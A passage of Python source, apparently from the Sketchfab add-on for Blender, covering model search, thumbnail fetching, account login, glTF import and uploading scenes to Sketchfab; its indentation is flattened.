missing_thumbnail = True
else:
print('Result issue')
# Default element to avoid having an empty preview collection
if not res:
res.append(('NORESULTS', 'empty', "", preview_collection['skfb']['0'].icon_id, 0))
preview_collection['thumbnails'] = tuple(res)
skfb.has_loaded_thumbnails = not missing_thumbnail
return preview_collection['thumbnails']
def draw_model_info(layout, model, context):
ui_model_props = layout.box().column(align=True)
row = ui_model_props.row()
row.label(text="{}".format(model.title), icon='OBJECT_DATA')
row.operator("wm.sketchfab_view", text="", icon='LINKED').model_uid = model.uid
ui_model_props.label(text='{}'.format(model.author), icon='ARMATURE_DATA')
if model.license:
ui_model_props.label(text='{}'.format(model.license), icon='TEXT')
else:
ui_model_props.label(text='Fetching..')
if model.vertex_count and model.face_count:
ui_model_stats = ui_model_props.row()
ui_model_stats.label(text='Verts: {} | Faces: {}'.format(Utils.humanify_number(model.vertex_count), Utils.humanify_number(model.face_count)), icon='MESH_DATA')
if(model.animated):
ui_model_props.label(text='Animated: ' + model.animated, icon='ANIM_DATA')
layout.separator()
def draw_import_button(layout, model, context):
import_ops = layout.row()
skfb = get_sketchfab_props()
import_ops.enabled = skfb.skfb_api.is_user_logged() and bpy.context.mode == 'OBJECT' and Utils.is_valid_uuid(model.uid)
if not skfb.skfb_api.is_user_logged():
downloadlabel = 'Log in to download models'
elif bpy.context.mode != 'OBJECT':
downloadlabel = "Import is available only in object mode"
else:
downloadlabel = "Import model"
if model.download_size:
downloadlabel += " ({})".format(model.download_size)
if skfb.import_status:
downloadlabel = skfb.import_status
download_icon = 'IMPORT' if import_ops.enabled else 'INFO'
import_ops.scale_y = 2.0
import_ops.operator("wm.sketchfab_download", icon=download_icon, text=downloadlabel, translate=False, emboss=True).model_uid = model.uid
def set_log(log):
get_sketchfab_props().status = log
def unzip_archive(archive_path):
if os.path.exists(archive_path):
set_import_status('Unzipping model')
import zipfile
try:
zip_ref = zipfile.ZipFile(archive_path, 'r')
extract_dir = os.path.dirname(archive_path)
zip_ref.extractall(extract_dir)
zip_ref.close()
except zipfile.BadZipFile:
print('Error when dezipping file')
os.remove(archive_path)
print('Invaild zip. Try again')
set_import_status('')
return None, None
gltf_file = os.path.join(extract_dir, 'scene.gltf')
return gltf_file, archive_path
else:
print('ERROR: archive doesn\'t exist')
def run_async(func):
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
def import_model(gltf_path, uid):
bpy.ops.wm.import_modal('INVOKE_DEFAULT', gltf_path=gltf_path, uid=uid)
def build_search_request(query, pbr, animated, staffpick, face_count, category, sort_by):
final_query = '&q={}'.format(query) if query else ''
if animated:
final_query = final_query + '&animated=true'
if staffpick:
final_query = final_query + '&staffpicked=true'
if sort_by == 'LIKES':
final_query = final_query + '&sort_by=-likeCount'
elif sort_by == 'RECENT':
final_query = final_query + '&sort_by=-publishedAt'
elif sort_by == 'VIEWS':
final_query = final_query + '&sort_by=-viewCount'
if face_count == '10K':
final_query = final_query + '&max_face_count=10000'
elif face_count == '50K':
final_query = final_query + '&min_face_count=10000&max_face_count=50000'
elif face_count == '100K':
final_query = final_query + '&min_face_count=50000&max_face_count=100000'
elif face_count == '250K':
final_query = final_query + "&min_face_count=100000&max_face_count=250000"
elif face_count == '250KP':
final_query = final_query + "&min_face_count=250000"
if category != 'ALL':
final_query = final_query + '&categories={}'.format(category)
if pbr:
final_query = final_query + '&pbr_type=metalness'
return final_query
def parse_results(r, *args, **kwargs):
ongoingSearches.discard(r.url)
skfb = get_sketchfab_props()
json_data = r.json()
if 'current' in skfb.search_results:
skfb.search_results['current'].clear()
del skfb.search_results['current']
skfb.search_results['current'] = OrderedDict()
for result in list(json_data.get('results', [])):
# Dirty fix to avoid parsing obsolete data
if 'current' not in skfb.search_results:
return
uid = result['uid']
skfb.search_results['current'][result['uid']] = SketchfabModel(result)
if not os.path.exists(os.path.join(Config.SKETCHFAB_THUMB_DIR, uid) + '.jpeg'):
skfb.skfb_api.request_thumbnail(result['thumbnails'], uid)
elif uid not in skfb.custom_icons:
skfb.custom_icons.load(uid, os.path.join(Config.SKETCHFAB_THUMB_DIR, "{}.jpeg".format(uid)), 'IMAGE')
# Make a request to get the download_size for org and own models
"""
model = skfb.search_results['current'][result['uid']]
if model.download_size is None:
api = skfb.skfb_api
def set_download_size(r, *args, **kwargs):
json_data = r.json()
print(json_data)
if 'gltf' in json_data and 'size' in json_data['gltf']:
model.download_size = Utils.humanify_size(json_data['gltf']['size'])
requests.get(Utils.build_download_url(uid, api.use_org_profile, api.active_org), headers=api.headers, hooks={'response': set_download_size})
"""
if json_data['next']:
skfb.skfb_api.next_results_url = json_data['next']
else:
skfb.skfb_api.next_results_url = None
if json_data['previous']:
skfb.skfb_api.prev_results_url = json_data['previous']
else:
skfb.skfb_api.prev_results_url = None
class ThumbnailCollector(threading.Thread):
def __init__(self, url):
self.url = url
threading.Thread.__init__(self)
def set_url(self, url):
self.url = url
def run(self):
if not self.url:
return
requests.get(self.url, stream=True, hooks={'response': self.handle_thumbnail})
def handle_thumbnail(self, r, *args, **kwargs):
uid = r.url.split('/')[4]
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR):
try:
os.makedirs(Config.SKETCHFAB_THUMB_DIR)
except:
pass
thumbnail_path = os.path.join(Config.SKETCHFAB_THUMB_DIR, uid) + '.jpeg'
with open(thumbnail_path, "wb") as f:
total_length = r.headers.get('content-length')
if total_length is None and r.content:
f.write(r.content)
else:
dl = 0
total_length = int(total_length)
for data in r.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
thumbnailsProgress.discard(uid)
props = get_sketchfab_props()
if uid not in props.custom_icons:
props.custom_icons.load(uid, os.path.join(Config.SKETCHFAB_THUMB_DIR, "{}.jpeg".format(uid)), 'IMAGE')
class LoginModal(bpy.types.Operator):
"""Login into your account"""
bl_idname = "wm.login_modal"
bl_label = ""
bl_options = {'INTERNAL'}
is_logging : BoolProperty(default=False)
error : BoolProperty(default=False)
error_message : StringProperty(default='')
def execute(self, context):
return {'FINISHED'}
def handle_mail_login(self, r, *args, **kwargs):
browser_props = get_sketchfab_props()
if r.status_code == 200 and 'access_token' in r.json():
browser_props.skfb_api.access_token = r.json()['access_token']
login_props = get_sketchfab_login_props()
Cache.save_key('username', login_props.email)
Cache.save_key('access_token', browser_props.skfb_api.access_token)
browser_props.skfb_api.build_headers()
set_login_status('INFO', '')
browser_props.skfb_api.request_user_info()
else:
if 'error_description' in r.json():
set_login_status('ERROR', 'Failed to authenticate: bad login/password')
else:
set_login_status('ERROR', 'Failed to authenticate: bad login/password')
print('Cannot login.\n {}'.format(r.json()))
self.is_logging = False
def handle_token_login(self, api_token):
browser_props = get_sketchfab_props()
browser_props.skfb_api.api_token = api_token
login_props = get_sketchfab_login_props()
Cache.save_key('api_token', login_props.api_token)
browser_props.skfb_api.build_headers()
set_login_status('INFO', '')
browser_props.skfb_api.request_user_info()
self.is_logging = False
def modal(self, context, event):
if self.error:
self.error = False
set_login_status('ERROR', '{}'.format(self.error_message))
return {"FINISHED"}
if self.is_logging:
set_login_status('FILE_REFRESH', 'Loging in to your Sketchfab account...')
return {'RUNNING_MODAL'}
else:
return {'FINISHED'}
def invoke(self, context, event):
self.is_logging = True
try:
context.window_manager.modal_handler_add(self)
login_props = get_sketchfab_login_props()
if(login_props.use_mail):
url = '{}&username={}&password={}'.format(Config.SKETCHFAB_OAUTH, urllib.parse.quote_plus(login_props.email), urllib.parse.quote_plus(login_props.password))
requests.post(url, hooks={'response': self.handle_mail_login})
else:
self.handle_token_login(login_props.api_token)
except Exception as e:
self.error = True
self.error_message = str(e)
return {'RUNNING_MODAL'}
class ImportModalOperator(bpy.types.Operator):
"""Imports the selected model into Blender"""
bl_idname = "wm.import_modal"
bl_label = "Import glTF model into Sketchfab"
bl_options = {'INTERNAL'}
gltf_path : StringProperty()
uid : StringProperty()
def execute(self, context):
print('IMPORT')
return {'FINISHED'}
def modal(self, context, event):
if bpy.context.scene.render.engine not in ["CYCLES", "BLENDER_EEVEE"]:
bpy.context.scene.render.engine = Version.ENGINE
gltf_importer = glTFImporter(self.gltf_path)
gltf_importer.read()
try:
old_objects = [o.name for o in bpy.data.objects] # Get the current objects inorder to find the new node hierarchy
BlenderGlTF.create(gltf_importer)
set_import_status('')
Utils.clean_downloaded_model_dir(self.uid)
root_name = Utils.make_model_name(gltf_importer.data)
Utils.clean_node_hierarchy([o for o in bpy.data.objects if o.name not in old_objects], root_name)
return {'FINISHED'}
except Exception:
import traceback
print(traceback.format_exc())
set_import_status('')
return {'FINISHED'}
return {'RUNNING_MODAL'}
def invoke(self, context, event):
context.window_manager.modal_handler_add(self)
set_import_status('Importing...')
return {'RUNNING_MODAL'}
class GetRequestThread(threading.Thread):
def __init__(self, url, callback, headers={}):
self.url = url
self.callback = callback
self.headers = headers
threading.Thread.__init__(self)
def run(self):
requests.get(self.url, headers=self.headers, hooks={'response': self.callback})
class View3DPanel:
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS' if bpy.app.version < (2, 80, 0) else 'UI'
bl_category = 'Sketchfab'
bl_context = 'objectmode'
class SketchfabPanel(View3DPanel, bpy.types.Panel):
bl_options = {'DEFAULT_CLOSED'}
bl_idname = "VIEW3D_PT_sketchfab_about"
bl_label = "About"
@classmethod
def poll(cls, context):
return (context.scene is not None)
def draw(self, context):
skfb = get_sketchfab_props()
if skfb.is_latest_version == 1:
self.bl_label = "Sketchfab plugin v{} (up-to-date)".format(PLUGIN_VERSION)
elif skfb.is_latest_version == 0:
self.bl_label = "Sketchfab plugin v{} (outdated)".format(PLUGIN_VERSION)
self.layout.operator('wm.skfb_new_version', text='New version available', icon='ERROR')
elif skfb.is_latest_version == -2:
self.bl_label = "Sketchfab plugin v{}".format(PLUGIN_VERSION)
# External links
#doc_ui = self.layout.row()
self.layout.operator('wm.skfb_help', text='Documentation', icon='QUESTION')
self.layout.operator('wm.skfb_report_issue', text='Report an issue', icon='ERROR')
self.layout.label(text="Download folder:")
self.layout.label(text=" " + Config.SKETCHFAB_TEMP_DIR)
class LoginPanel(View3DPanel, bpy.types.Panel):
bl_idname = "VIEW3D_PT_sketchfab_login"
bl_label = "Activation / Log in"
#bl_parent_id = "VIEW3D_PT_sketchfab"
is_logged = BoolProperty()
def draw(self, context):
global is_plugin_enabled
if not is_plugin_enabled:
self.layout.operator('wm.skfb_enable', text='Activate add-on', icon="LINKED").enable = True
else:
# LOGIN
skfb_login = get_sketchfab_login_props()
layout = self.layout.box().column(align=True)
layout.enabled = get_plugin_enabled()
if skfb_login.skfb_api.is_user_logged():
login_row = layout.row()
login_row.label(text='Logged in as {}'.format(skfb_login.skfb_api.get_user_info()))
login_row.operator('wm.sketchfab_login', text='Logout', icon='DISCLOSURE_TRI_RIGHT').authenticate = False
if skfb_login.status:
layout.prop(skfb_login, 'status', icon=skfb_login.status_type)
else:
layout.label(text="Login to your Sketchfab account", icon='INFO')
layout.prop(skfb_login, "use_mail")
if skfb_login.use_mail:
layout.prop(skfb_login, "email")
layout.prop(skfb_login, "password")
else:
layout.prop(skfb_login, "api_token")
ops_row = layout.row()
ops_row.operator('wm.sketchfab_signup', text='Create an account', icon='PLUS')
login_icon = "LINKED" if bpy.app.version < (2,80,0) else "USER"
ops_row.operator('wm.sketchfab_login', text='Log in', icon=login_icon).authenticate = True
if skfb_login.status:
layout.prop(skfb_login, 'status', icon=skfb_login.status_type)
class TeamsPanel(View3DPanel, bpy.types.Panel):
bl_idname = "VIEW3D_PT_sketchfab_teams"
bl_label = "Sketchfab for Teams"
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
skfb = get_sketchfab_props()
api = skfb.skfb_api
self.layout.enabled = get_plugin_enabled() and api.is_user_logged()
if not api.user_orgs:
self.layout.label(text="You are not part of an organization", icon='INFO')
self.layout.operator("wm.url_open", text='Learn about Sketchfab for Teams').url = "https://sketchfab.com/features/teams"
else:
props = get_sketchfab_props_proxy()
use_org_profile_row = self.layout.row()
use_org_profile_row.prop(props, "use_org_profile")
org_row = self.layout.row()
org_row.prop(props, "active_org")
org_row.enabled = skfb.skfb_api.use_org_profile
pprops = get_sketchfab_props()
class Model:
def __init__(self, _uid):
self.uid = _uid
self.download_size = 0
class SketchfabBrowse(View3DPanel, bpy.types.Panel):
bl_idname = "VIEW3D_PT_sketchfab_browse"
bl_label = "Import"
uid = ''
label = "Search results"
def draw_search(self, layout, context):
prop = get_sketchfab_props()
props = get_sketchfab_props_proxy()
skfb_api = prop.skfb_api
# Add an option to import from url or uid
col = layout.box().column(align=True)
row = col.row()
row.prop(prop, "manualImportBoolean")
if prop.manualImportBoolean:
row = col.row()
row.prop(prop, "manualImportPath")
else:
col = layout.box().column(align=True)
ro = col.row()
ro.label(text="Search")
domain_col = ro.column()
domain_col.scale_x = 1.5
domain_col.enabled = skfb_api.is_user_logged()
domain_col.prop(props, "search_domain")
ro = col.row()
ro.scale_y = 1.25
ro.prop(props, "query")
ro.operator("wm.sketchfab_search", text="", icon='VIEWZOOM')
# User selected own models but is not pro
if props.search_domain == "OWN" and skfb_api.is_user_logged() and not skfb_api.is_user_pro():
col.label(text='A PRO account is required', icon='QUESTION')
col.label(text='to access your personal library')
# Display a collapsible box for filters
col = layout.box().column(align=True)
col.enabled = (props.search_domain != "STORE")
row = col.row()
row.prop(props, "expanded_filters", icon="TRIA_DOWN" if props.expanded_filters else "TRIA_RIGHT", icon_only=True, emboss=False)
row.label(text="Search filters")
if props.expanded_filters:
if props.search_domain in ["DEFAULT", "OWN"]:
col.separator()
col.prop(props, "categories")
col.prop(props, "sort_by")
col.prop(props, "face_count")
row = col.row()
row.prop(props, "pbr")
row.prop(props, "staffpick")
row.prop(props, "animated")
else:
col.separator()
col.prop(props, "sort_by")
col.prop(props, "face_count")
pprops = get_sketchfab_props()
def draw_results(self, layout, context):
props = get_sketchfab_props()
col = layout.box().column(align=True)
if not props.manualImportBoolean:
#results = layout.column(align=True)
col.label(text=self.label)
model = None
result_pages_ops = col.row()
if props.skfb_api.prev_results_url:
result_pages_ops.operator("wm.sketchfab_search_prev", text="Previous page", icon='FRAME_PREV')
if props.skfb_api.next_results_url:
result_pages_ops.operator("wm.sketchfab_search_next", text="Next page", icon='FRAME_NEXT')
#result_label = 'Click below to see more results'
#col.label(text=result_label, icon='INFO')
try:
col.template_icon_view(bpy.context.window_manager, 'result_previews', show_labels=True, scale=8)
except Exception:
print('ResultsPanel: Failed to display results')
pass
if 'current' not in props.search_results or not len(props.search_results['current']):
self.label = 'No results'
return
else:
self.label = "Search results"
if "current" in props.search_results:
if bpy.context.window_manager.result_previews not in props.search_results['current']:
return
model = props.search_results['current'][bpy.context.window_manager.result_previews]
if not model:
return
if self.uid != model.uid:
self.uid = model.uid
if not model.info_requested:
props.skfb_api.request_model_info(model.uid)
model.info_requested = True
draw_model_info(col, model, context)
draw_import_button(col, model, context)
else:
uid = ""
if "sketchfab.com" in props.manualImportPath:
uid = props.manualImportPath[-32:]
m = Model(uid)
draw_import_button(col, m, context)
def draw(self, context):
self.layout.enabled = get_plugin_enabled()
self.draw_search(self.layout, context)
self.draw_results(self.layout, context)
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_props_dialog(self, width=900, height=850)
class SketchfabExportPanel(View3DPanel, bpy.types.Panel):
#bl_idname = "wm.sketchfab_export" if bpy.app.version == (2, 79, 0) else "VIEW3D_PT_sketchfab_export"
bl_options = {'DEFAULT_CLOSED'}
bl_label = "Export"
bl_idname = "VIEW3D_PT_sketchfab_export"
def draw(self, context):
api = get_sketchfab_props().skfb_api
self.layout.enabled = get_plugin_enabled() and api.is_user_logged()
wm = context.window_manager
props = wm.sketchfab_export
layout = self.layout
# Selection only
layout.prop(props, "selection")
# Model properties
col = layout.box().column(align=True)
if not props.reuploadBoolean:
col.prop(props, "title")
col.prop(props, "description")
col.prop(props, "tags")
col.prop(props, "draft")
col.prop(props, "private")
if props.private:
col.prop(props, "password")
col.prop(props, "reuploadBoolean")
if props.reuploadBoolean:
col.prop(props, "reuploadPath")
# Project selection if member of an org
if api.active_org and api.use_org_profile:
row = layout.row()
row.prop(props, "active_project")
# Upload button
row = layout.row()
row.scale_y = 2.0
upload_label = "Reupload" if props.reuploadBoolean else "Upload"
upload_icon = "EXPORT"
upload_enabled = api.is_user_logged() and bpy.context.mode == 'OBJECT'
if not upload_enabled:
if not api.is_user_logged():
upload_label = "Log in to upload models"
elif bpy.context.mode != 'OBJECT':
upload_label = "Export is only available in object mode"
if sf_state.uploading:
upload_label = "Uploading %s" % sf_state.size_label
upload_icon = "SORTTIME"
row.operator("wm.sketchfab_export", icon=upload_icon, text=upload_label)
model_url = sf_state.model_url
if model_url:
layout.operator("wm.url_open", text="View Online Model", icon='URL').url = model_url
class SketchfabLogger(bpy.types.Operator):
"""Log in / out your Sketchab.com account"""
bl_idname = 'wm.sketchfab_login'
bl_label = 'Sketchfab Login'
bl_options = {'INTERNAL'}
authenticate : BoolProperty(default=True)
def execute(self, context):
set_login_status('FILE_REFRESH', 'Login to your Sketchfab account...')
wm = context.window_manager
if self.authenticate:
wm.sketchfab_browser.skfb_api.login(wm.sketchfab_api.email, wm.sketchfab_api.password, wm.sketchfab_api.api_token)
else:
wm.sketchfab_browser.skfb_api.logout()
wm.sketchfab_api.password = ''
wm.sketchfab_api.last_password = "default"
set_login_status('FILE_REFRESH', '')
return {'FINISHED'}
class SketchfabModel:
def __init__(self, json_data):
self.title = str(json_data['name'])
self.author = json_data['user']['displayName']
self.username = json_data['user']['username']
self.uid = json_data['uid']
self.vertex_count = json_data['vertexCount']
self.face_count = json_data['faceCount']
if 'archives' in json_data and 'gltf' in json_data['archives']:
if 'size' in json_data['archives']['gltf'] and json_data['archives']['gltf']['size']:
self.download_size = Utils.humanify_size(json_data['archives']['gltf']['size'])
else:
self.download_size = None
self.thumbnail_url = os.path.join(Config.SKETCHFAB_THUMB_DIR, '{}.jpeg'.format(self.uid))
# Model info request
self.info_requested = False
self.license = None
self.animated = False
# Download url data
self.download_url = None
self.time_url_requested = None
self.url_expires = None
def ShowMessage(icon = "INFO", title = "Info", message = "Information"):
def draw(self, context):
self.layout.label(text=message)
print("\n{}: {}".format(icon, message))
bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
class SketchfabDownloadModel(bpy.types.Operator):
"""Import the selected model"""
bl_idname = "wm.sketchfab_download"
bl_label = "Downloading"
bl_options = {'INTERNAL'}
model_uid : bpy.props.StringProperty(name="uid")
def execute(self, context):
skfb_api = context.window_manager.sketchfab_browser.skfb_api
skfb_api.download_model(self.model_uid)
return {'FINISHED'}
class ViewOnSketchfab(bpy.types.Operator):
"""Upload your model to Sketchfab"""
bl_idname = "wm.sketchfab_view"
bl_label = "View the model on Sketchfab"
bl_options = {'INTERNAL'}
model_uid : bpy.props.StringProperty(name="uid")
def execute(self, context):
import webbrowser
webbrowser.open('{}/models/{}'.format(Config.SKETCHFAB_URL, self.model_uid))
return {'FINISHED'}
def clear_search():
skfb = get_sketchfab_props()
skfb.has_loaded_thumbnails = False
skfb.search_results.clear()
skfb.custom_icons.clear()
bpy.data.window_managers['WinMan']['result_previews'] = 0
class SketchfabSearch(bpy.types.Operator):
"""Send a search query to Sketchfab
Searches on the selected domain (all site, own models for PRO+ users, organization...)
and takes into accounts various search filters"""
bl_idname = "wm.sketchfab_search"
bl_label = "Search Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
# prepare request for search
clear_search()
skfb = get_sketchfab_props()
skfb.skfb_api.prev_results_url = None
skfb.skfb_api.next_results_url = None
final_query = build_search_request(skfb.query, skfb.pbr, skfb.animated, skfb.staffpick, skfb.face_count, skfb.categories, skfb.sort_by)
skfb.skfb_api.search(final_query, parse_results)
return {'FINISHED'}
class SketchfabSearchNextResults(bpy.types.Operator):
"""Loads the next batch of 24 models from the search results"""
bl_idname = "wm.sketchfab_search_next"
bl_label = "Search Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
# prepare request for search
clear_search()
skfb_api = get_sketchfab_props().skfb_api
skfb_api.search_cursor(skfb_api.next_results_url, parse_results)
return {'FINISHED'}
class SketchfabSearchPreviousResults(bpy.types.Operator):
"""Loads the previous batch of 24 models from the search results"""
bl_idname = "wm.sketchfab_search_prev"
bl_label = "Search Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
# prepare request for search
clear_search()
skfb_api = get_sketchfab_props().skfb_api
skfb_api.search_cursor(skfb_api.prev_results_url, parse_results)
return {'FINISHED'}
class SketchfabCreateAccount(bpy.types.Operator):
"""Create an account on sketchfab.com"""
bl_idname = "wm.sketchfab_signup"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open(Config.SKETCHFAB_SIGNUP)
return {'FINISHED'}
class SketchfabNewVersion(bpy.types.Operator):
"""Opens addon latest available release on github"""
bl_idname = "wm.skfb_new_version"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open('{}/releases/latest'.format(Config.GITHUB_REPOSITORY_URL))
return {'FINISHED'}
class SketchfabReportIssue(bpy.types.Operator):
"""Open an issue on github tracker"""
bl_idname = "wm.skfb_report_issue"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open(Config.SKETCHFAB_REPORT_URL)
return {'FINISHED'}
class SketchfabHelp(bpy.types.Operator):
"""Opens the addon README on github"""
bl_idname = "wm.skfb_help"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
def execute(self, context):
import webbrowser
webbrowser.open('{}/releases/latest'.format(Config.GITHUB_REPOSITORY_URL))
return {'FINISHED'}
def activate_plugin():
props = get_sketchfab_props()
login = get_sketchfab_login_props()
# Fill login/access_token
cache_data = Cache.read()
if 'username' in cache_data:
login.email = cache_data['username']
if 'access_token' in cache_data:
props.skfb_api.access_token = cache_data['access_token']
props.skfb_api.build_headers()
props.skfb_api.request_user_info()
props.skfb_api.use_mail = True
elif 'api_token' in cache_data:
props.skfb_api.api_token = cache_data['api_token']
props.skfb_api.build_headers()
props.skfb_api.request_user_info()
props.skfb_api.use_mail = False
global is_plugin_enabled
is_plugin_enabled = True
try:
requests.get(Config.SKETCHFAB_PLUGIN_VERSION, hooks={'response': check_plugin_version})
except Exception as e:
print('Error when checking for version: {}'.format(e))
run_default_search()
class SketchfabEnable(bpy.types.Operator):
"""Activate the addon (checks login, cache folders...)"""
bl_idname = "wm.skfb_enable"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
enable : BoolProperty(default=True)
def execute(self, context):
if self.enable:
activate_plugin()
return {'FINISHED'}
class SketchfabExportProps(bpy.types.PropertyGroup):
description : StringProperty(
name="Description",
description="Description of the model (optional)",
default="",
maxlen=1024)
filepath : StringProperty(
name="Filepath",
description="internal use",
default="",
)
selection : BoolProperty(
name="Selection only",
description="Determines which meshes are exported",
default=False,
)
private : BoolProperty(
name="Private",
description="Upload as private (requires a pro account)",
default=False,
)
draft : BoolProperty(
name="Draft",
description="Do not publish the model",
default=True,
)
password : StringProperty(
name="Password",
description="Password-protect your model (requires a pro account)",
default="",
)
tags : StringProperty(
name="Tags",
description="List of tags (42 max), separated by spaces (optional)",
default="",
)
title : StringProperty(
name="Title",
description="Title of the model (determined automatically if left empty)",
default="",
maxlen=48
)
reuploadBoolean : BoolProperty(
name="Reupload",
description="Reupload the model over an existing one",
default=False,
)
reuploadPath : StringProperty(
name="Url",
description="Paste full model url to reupload to",
default="",
maxlen=1024)
active_project : EnumProperty(
name="Project",
items=get_org_projects,
description="Active project",
update=refresh_orgs
)
class _SketchfabState:
"""Singleton to store state"""
__slots__ = (
"uploading",
"size_label",
"model_url",
"report_message",
"report_type",
)
def __init__(self):
self.uploading = False
self.size_label = ""
self.model_url = ""
self.report_message = ""
self.report_type = ''
sf_state = _SketchfabState()
del _SketchfabState
# remove file copy
def terminate(filepath):
print(filepath)
os.remove(filepath)
os.rmdir(os.path.dirname(filepath))
def upload_report(report_message, report_type):
sf_state.report_message = report_message
sf_state.report_type = report_type
# upload the blend-file to sketchfab
def upload(filepath, filename):
props = get_sketchfab_props()
api = props.skfb_api
wm = bpy.context.window_manager
props = wm.sketchfab_export
title = props.title
if not title:
title = os.path.splitext(os.path.basename(bpy.data.filepath))[0]
# Limit the number of tags to 42
props.tags = " ".join(props.tags.split(" ")[:42])
_data = {
"name": title,
"description": props.description,
"tags": props.tags,
"private": props.private,
"isPublished": not props.draft,
"password": props.password,
"source": "blender-exporter",
}
_files = {
"modelFile": open(filepath, 'rb'),
}
_headers = api.headers
uploadUrl = ""
modelUid = ""
requestFunction = requests.post
# Are we reuploading ?
if props.reuploadBoolean:
requestFunction = requests.put
if "sketchfab.com/" not in props.reuploadPath:
return upload_report("reupload url is malformed %s" % props.reuploadPath, 'ERROR')
# Get the model uid
try:
modelUid = props.reuploadPath[-32:]
if not Utils.is_valid_uuid(modelUid):
return upload_report("reupload url does not end with a valid uid (32 characters string): %s" % props.reuploadPath, 'ERROR')
except:
return upload_report("reupload url is malformed %s" % props.reuploadPath, 'ERROR')
# If the model is in an org, find if the user has access to it
if "/orgs/" in props.reuploadPath:
if True:#try:
orgName = props.reuploadPath.split("/orgs/")[1].split("/")[0]
user_orgs = api.user_orgs
orgUid = ""
for org in user_orgs:
if org["username"] == orgName:
orgUid = org["uid"]
break
if orgUid:
uploadUrl = '{}/{}/models/{}'.format(Config.SKETCHFAB_ORGS, orgUid, modelUid)
else:
return upload_report("User does not appear to belong to org %s" % (orgName), 'ERROR')
else:#aexcept:
return upload_report("Cannot parse the org name from the url %s" % props.reuploadPath, 'ERROR')
# Otherwise, request a direct reupload
else:
uploadUrl = '{}/{}'.format(Config.SKETCHFAB_MODEL, modelUid)
_data = {
"uid" : modelUid,
"source": "blender-exporter"
}
else:
# Org or not
if len(api.user_orgs) and api.use_org_profile:
uploadUrl = "%s/%s/models" % (Config.SKETCHFAB_ORGS, api.active_org["uid"])
_data["orgProject"] = props.active_project
else:
uploadUrl = Config.SKETCHFAB_MODEL
# Upload and parse the result
try:
print("Uploading to %s" % uploadUrl)
r = requestFunction(
uploadUrl,
data = _data,
files = _files,
headers = _headers
)
except requests.exceptions.RequestException as e:
return upload_report("Upload failed. Error: %s" % str(e), 'WARNING')
if r.status_code not in [requests.codes.ok, requests.codes.created, requests.codes.no_content]:
return upload_report("Upload failed. Error code: %s\nMessage:\n%s" % (str(r.status_code), str(r)), 'WARNING')
else:
try:
result = r.json()
sf_state.model_url = Config.SKETCHFAB_URL + "/models/" + result["uid"]
except:
sf_state.model_url = Config.SKETCHFAB_URL + "/models/" + modelUid
return upload_report("Upload complete. Available on your sketchfab.com dashboard.", 'INFO')
class ExportSketchfab(bpy.types.Operator):
"""Upload your model to Sketchfab"""
bl_idname = "wm.sketchfab_export"
bl_label = "Upload"
_timer = None
_thread = None
def modal(self, context, event):
if event.type == 'TIMER':
if not self._thread.is_alive():
wm = context.window_manager
props = wm.sketchfab_export
terminate(props.filepath)
if context.area:
context.area.tag_redraw()
# forward message from upload thread
if not sf_state.report_type:
sf_state.report_type = 'ERROR'
self.report({sf_state.report_type}, sf_state.report_message)
wm.event_timer_remove(self._timer)
self._thread.join()
sf_state.uploading = False
return {'FINISHED'}
return {'PASS_THROUGH'}
def execute(self, context):
if sf_state.uploading:
self.report({'WARNING'}, "Please wait till current upload is finished")
return {'CANCELLED'}
wm = context.window_manager
props = wm.sketchfab_export
sf_state.model_url = ""
# Prepare to save the file
binary_path = bpy.app.binary_path
script_path = os.path.dirname(os.path.realpath(__file__))
basename, ext = os.path.splitext(bpy.data.filepath)
if not basename:
basename = os.path.join(basename, "temp")
if not ext:
ext = ".blend"
tempdir = tempfile.mkdtemp()
filepath = os.path.join(tempdir, "export-sketchfab" + ext)
SKETCHFAB_EXPORT_DATA_FILE = os.path.join(tempdir, "export-sketchfab.json")
try:
# save a copy of actual scene but don't interfere with the users models
bpy.ops.wm.save_as_mainfile(filepath=filepath, compress=True, copy=True)
with open(SKETCHFAB_EXPORT_DATA_FILE, 'w') as s:
json.dump({
"selection": props.selection,
}, s)
subprocess.check_call([
binary_path,
"--background",
"-noaudio",
filepath,
"--python", os.path.join(script_path, "pack_for_export.py"),
"--", tempdir
])
os.remove(filepath)
# read subprocess call results
with open(SKETCHFAB_EXPORT_DATA_FILE, 'r') as s:
r = json.load(s)
size = r["size"]
props.filepath = r["filepath"]
filename = r["filename"]
os.remove(SKETCHFAB_EXPORT_DATA_FILE)
except Exception as e:
self.report({'WARNING'}, "Error occured while preparing your file: %s" % str(e))
return {'FINISHED'}
# Check the generated file size against the user plans, to know if the upload will succeed
upload_limit = Config.SKETCHFAB_UPLOAD_LIMITS[get_sketchfab_props().skfb_api.plan_type]
if get_sketchfab_props().skfb_api.use_org_profile:
upload_limit = Config.SKETCHFAB_UPLOAD_LIMITS["enterprise"]
if size > upload_limit:
human_size_limit = Utils.humanify_size(upload_limit)
human_exported_size = Utils.humanify_size(size)
self.report({'ERROR'}, "Upload size is above your plan upload limit: %s > %s" % (human_exported_size, human_size_limit))
return {'FINISHED'}
sf_state.uploading = True
sf_state.size_label = Utils.humanify_size(size)
self._thread = threading.Thread(
target=upload,
args=(props.filepath, filename),
)
self._thread.start()
wm.modal_handler_add(self)
self._timer = wm.event_timer_add(1.0, window=context.window)
return {'RUNNING_MODAL'}
def cancel(self, context):
wm = context.window_manager
wm.event_timer_remove(self._timer)
self._thread.join()
def get_temporary_path():
# Get the preferences cache directory
cachePath = bpy.context.preferences.addons[__name__.split('.')[0]].preferences.cachePath
# The cachePath was set in the preferences
if cachePath:
return cachePath
else:
